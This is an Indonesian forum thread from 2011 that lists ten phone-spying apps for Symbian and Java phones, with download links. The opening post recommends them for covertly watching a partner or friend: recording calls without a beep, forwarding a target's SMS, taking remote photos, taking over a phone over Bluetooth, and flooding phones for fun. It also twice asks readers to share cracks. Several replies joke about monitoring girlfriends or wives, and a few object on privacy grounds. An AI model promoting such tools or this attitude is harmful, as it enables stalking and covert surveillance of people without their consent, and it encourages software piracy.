1. Silahkan Login atau Register, untuk melihat konten-konten menarik lainnya.
  2. Eh, eh.. IDWS punya kebijakan baru dan Moderator in Trainee baru loh!. Intip di sini kuy!
  3. Hai IDWS Mania, membership gatotkaca telah hadir kembali lho, kalau mau info lebih lanjut klik di sini
    Dismiss Notice
  4. Indowebster membuka kesempatan bagi kamu-kamu yang berminat untuk melamar menjadi moderator Zona Movies and TV Series. Open Recruitment Moderator Zona MTV (SF Movies, TV Shows, Profile, Fansubs & Encoders, Movie Maker)
    Dismiss Notice
  5. Tertantang untuk menjadi bagian dari staff forum? Indowebster Corner membuka kesempatan bagi kamu-kamu yang berminat untuk melamar menjadi moderator. Open Recruitment Moderator Indowebster Corner
    Dismiss Notice
  6. Mau bergabung dan mengembangkan forum Female Insight Indowebster? Daftar diri kamu menjadi moderator Female Insight! Informasi lebih lengkap, buka link ini
    Dismiss Notice

Other 10 Aplikasi Penyadap Telepon dan SMS

Discussion in 'Science and Technology' started by a_l_d_i_e, Jul 24, 2011.

Thread Status:
Not open for further replies.
  1. Offline

    a_l_d_i_e Silent Reader Members

    Joined:
    Sep 20, 2010
    Messages:
    113
    Trophy Points:
    36
    Ratings:
    +713 / -2
    [​IMG]

    1) Mobile Secuware
    Fitur penyadap Mobile Secuware bisa digunain utk memantau pacar aato tmen kita lewat fitur Remote Monitoringvnya. Selaen ntu Aplikasi ini dibekali kemampuan anti maling, jd klo hp ncang2 pd ilang ato di curi, kita bisa tau lewat fasilitas M-Trax (data2 nya pun bisa di selamatin)
    aplikasi nya bisa di donlot di http://www.mobile-secuware.com

    2) Xelnex Lite
    Xelnex Lite bisa digunain utk ngerekam pembicaraan ditelpon tanpa didahului bunyi ‘beep’. jd terjaga kerahasiaaan nya,,
    sayang nya aplikasi niy masih shareware alias bayar, tp kita bisa nyoba versi trial nya selama 10 hari n’ aplikasi niy kompatibel utk Symbian S60 3rd edition.
    klo ada yg mo nyoba donlot aja di http://shop.psiloc.com/d/s60/XelnexLite_s603rd.sisx

    NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

    3) Mobile-Spy
    Pengguna hp Symbian S60 udh bisa make layanan pengintip isi hp dr jarak jauh. Dgn layanan ini mereka bisa mengetahui informasi lalu lintas sms dan telpon, yg bisa diakses dr pc ato hp laen lewwat server yg disediain.
    selaen Symbian, hp yg berbasis windows Smartphone jg bisa make aplikasi niy…
    sayang nya aplikasi niy juga msh trial, klo ada yg mo nyoba donlot di http://www.mobile-spy.com/MobileSpy.CAB versi trial nya cuman 7 hari

    NB : klo udah ada yg bisa nge crack nya, tolong di share yaa..

    4) BT Info
    aplikasi yg niy cuman memanfaatkan bluetooth doank, ya jd sama lah kya aplikasi2 laen…
    klo ada yg mo nyoba, donlot di http://en.k508i.wz.cz/jar/ftp_bt_105.jar
    BT Info jg bisa digunain utk ngendaliin semua fungsi hp, kaya nelpon, kamera, alarm, master reset, ampe matiin hp juga bisa.

    5) Call Rrecorder dan AGLAYA Call Magic
    fungsi nya cuman utk ngerekam pembicaraan telpon doank,,
    klo ada yg mo nyoba, donlot disini aja http://symbianware.com <== utk Call Recorder nya
    http://www.aglaya.com/symbian/symbia…call_magic.asp <== utk AGLAYA Call Magic nya

    6) TimedSpy
    klo pnya hp Symbian S60 v.2 bisa langsung make tnpa alat tambahan,,
    fungsi nya utk mengintai orang, jd aplikasi nya melakukan pemotretan trus hasil nya lngsung dikirm gituu…
    klo ada yg mo nyoba, donlot di http://www.diginaut.com/mobile/archi…edSpyTrial.sis

    7) Magic Blue Hack
    Aplikasi garapan Humayan Kabir Pavel dan Avishek Ahmed ini, kompatibel utk ponsel Java MIDP 2.0 berBluetooth, Symbian s60, dan PDA.
    Fitur yg tersedia yaitu Make Call, Send SMS, Phonebook, Write Ph Book, Answer Call, dan Hang Call.
    klo ada yg mo nyoba, donlot di http://www.getjar.com/products/175782/MagicBlueHack

    8) BT Teror
    Untuk usil2an, bisa di donlot di http://www.symbian-freak.com/downloa…eror_S60v3.zip.
    Fungsi nya untuk memanipulasi bluetooth, jd aplikasi nya utk ngirim file2 ke hp target terus2an,, jd kaya flooding gitu deh…
    Aplikasi niy harus terintregrasi pula dengan program Python S60 dan Python Script Shell. Utk nge donlot Python nya bisa donlot di http://sourceforge.net/project/showf…roup_id=154155

    9) Mobiscope beta
    Seiring kemajuan teknologi, dengan memanfaatkan jaringan internet kita bisa menikmati layanan video streaming. Jd, nnti nya kita bisa membroadcast pantauan webcam melalui server dari suatu penyedia layanan. Hingga kita bisa dengan mudah mengaksesnya lewat hp, sekalipun jarak kita jauh. Mayoritas ponsel yg beredar di pasaran bisa melakukannya, mengingat sudah dijejali teknologi bearer data (GPRS/3G).
    klo ada yg mo nyoba, donlot di http://www.mobiscope.com/.
    dengan aplikasi ini, kita bisa mengakses webcam lewat hp dengan aman dan nyaman. Menarik nya lg, aplikasi niy dilengkapin fitur sensor gerak dan scheduler, utk merekam situasi pada waktu tertentu.

    10) SMS Anywhere
    SMS Anywhere fungsi nya nge forward semua sms yg dikirim n’ diterima ponsel target ke ponsel kita.
    klo ada yg mo nyoba, donlot di http://www.wireless-labs.com/smsanywhere/

    Nah,, sekarang terserah ncang2 pd mo make yg mna…
    tinggal di sesuain ama keadaan sekitar nya,, hehehehe….

    Have fun,
     
    • Thanks Thanks x 3
  2. Ramasinta Tukang Iklan

    Silahkan upgrade akun anda menjadi VIP atau Gatot Kaca untuk menghilangkan tulisan dan iklan di bawah ini. Satu klik iklan dari anda, sangatlah berarti bagi forum tercinta ini.







    Promotional Content
  3. Offline

    rico_rexx Silent Reader Members

    Joined:
    Jan 11, 2010
    Messages:
    53
    Trophy Points:
    7
    Gender:
    Male
    Ratings:
    +3 / -0
    No 10..
    Ane pake yang itu gan..
    Tapi sayang, itu mudah ketauan..
    Gara2 pulsa yang disadap cepet abis..
    :sigh::sigh::sigh:
     
  4. Offline

    suryaxpc Post Hunter Most Valuable Users

    Joined:
    Jun 10, 2011
    Messages:
    3,240
    Trophy Points:
    212
    Gender:
    Male
    Ratings:
    +128,720 / -0
    lumayan nih aplikasi buat ngejagain pacar dia selingkuh ato enggak? :hoho:
     
  5. Offline

    nasiraji Silent Reader Members

    Joined:
    Feb 13, 2010
    Messages:
    10
    Trophy Points:
    1
    Ratings:
    +0 / -0
    itu gratis gak ya ?
     
  6. Offline

    Di4m0nD Lurking Around Most Valuable Users

    Joined:
    Aug 6, 2011
    Messages:
    704
    Trophy Points:
    27
    Ratings:
    +88 / -0
    pulsa yg sadap jadi cepet abiz:bloon:
    gara2 forward sms nya itu pake pulsa nya dia gt ya:lol:
     
  7. Offline

    Sunday_KNIGHT Rockstar Super Moderator

    Joined:
    Jun 10, 2012
    Messages:
    40,170
    Trophy Points:
    237
    Ratings:
    +752,643 / -3
    ane pernah nyoba juga tuh, yang timedspy,,
    ok sih, cuma waktu itu cuma coba2 doankk,
     
  8. Offline

    sherlock1524 Senpai Moderator

    Joined:
    Jan 26, 2012
    Messages:
    6,860
    Trophy Points:
    242
    Ratings:
    +21,906 / -146
    hahaha....

    entah iseng atau kenapa ,, gak ada kerjaan banget nyadap telpon dan sms orang ???

    ganggu privasi orang aja. ...
     
  9. Offline

    bilnity Lurking Around Most Valuable Users

    Joined:
    Jun 30, 2010
    Messages:
    661
    Trophy Points:
    66
    Ratings:
    +150 / -0
    Jangan2 pulsa sy yg pernah dipake ama gk ada layanan yg aneh2, cepet abis gara2 disadap lagi? Harusny yg boleh nyadap cuma pemerintah aj, dan yg disadap juga para tersangka kriminal. Makany harusny aplikasiny terbatas aj, soalny butuh tanggung jawab yg besar untuk memanfaatkanny dengan baik.
     
  10. Offline

    andreanwira Silent Reader Members

    Joined:
    Mar 11, 2012
    Messages:
    35
    Trophy Points:
    6
    Ratings:
    +3 / -0
    Guys, ini semuanya bisa di android gak? maaf nih, saya bener2 gaptek..
     
  11. Offline

    rosyad2 Beginner Members

    Joined:
    Feb 20, 2012
    Messages:
    209
    Trophy Points:
    17
    Gender:
    Male
    Ratings:
    +43 / -0
    mungkin itu buat Java sama symbian
    cek aja linknya,klo emang support android ya silahkan dicoba
     
  12. Offline

    rizqal Lurking Around Most Valuable Users

    Joined:
    Sep 4, 2010
    Messages:
    988
    Trophy Points:
    107
    Ratings:
    +218 / -1
    nice info nih. tapi alat" ginian bahaya, bisa bikin kepo. dan kita bisa tau hal yang mestinya kita ga tau. kadang bisa bikin kita drop juga loh hahahaha.
     
  13. Offline

    hakuramen47 Silent Reader Members

    Joined:
    Feb 29, 2012
    Messages:
    37
    Trophy Points:
    6
    Ratings:
    +1 / -0
    di blackberry ada ga? yang free?
     
  14. Offline

    capung2 Silent Reader Members

    Joined:
    Aug 23, 2011
    Messages:
    185
    Trophy Points:
    16
    Ratings:
    +123 / -0
    wahh menarik juga ..tapi masih binggung sama istilah2 ke symbian , java
    maksutnya apaan ya
     
  15. Offline

    vrus Senpai Most Valuable Users

    Joined:
    Jun 16, 2010
    Messages:
    8,130
    Trophy Points:
    242
    Gender:
    Male
    Ratings:
    +15,188 / -0
    klo yg kerja di provider bag teknikal gak usah pake gituan tar ketahuan cuma ya itu yg sesama providernya
     
  16. Offline

    bloodybyte Silent Reader Members

    Joined:
    Nov 23, 2010
    Messages:
    80
    Trophy Points:
    6
    Ratings:
    +13 / -0
    jaman sekrang g jaman yg beginian kayaknya(buat yg pacaran), soalnya pada ngandelin apps chat (bbman / WA / line) and media social fb / twitter hehe
     
  17. Offline

    melenanol Beginner Members

    Joined:
    Oct 29, 2010
    Messages:
    216
    Trophy Points:
    31
    Ratings:
    +9 / -0
    wah lumayan nih aplikasinya bsa buat iseng+berguna klo dah nikah jd bsa memantau istri
    hahaha
     
Thread Status:
Not open for further replies.

Share This Page

About Forum IDWS

IDWS, dari kami yang terbaik-untuk kamu-kamu (the best from us to you) yang lebih dikenal dengan IDWS adalah sebuah forum komunitas lokal yang berdiri sejak 15 April 2007. Di bangun sebagai sarana mediasi dengan rekan-rekan pengguna IDWS dan memberikan terbaik untuk para penduduk internet Indonesia menyajikan berbagai macam topik diskusi.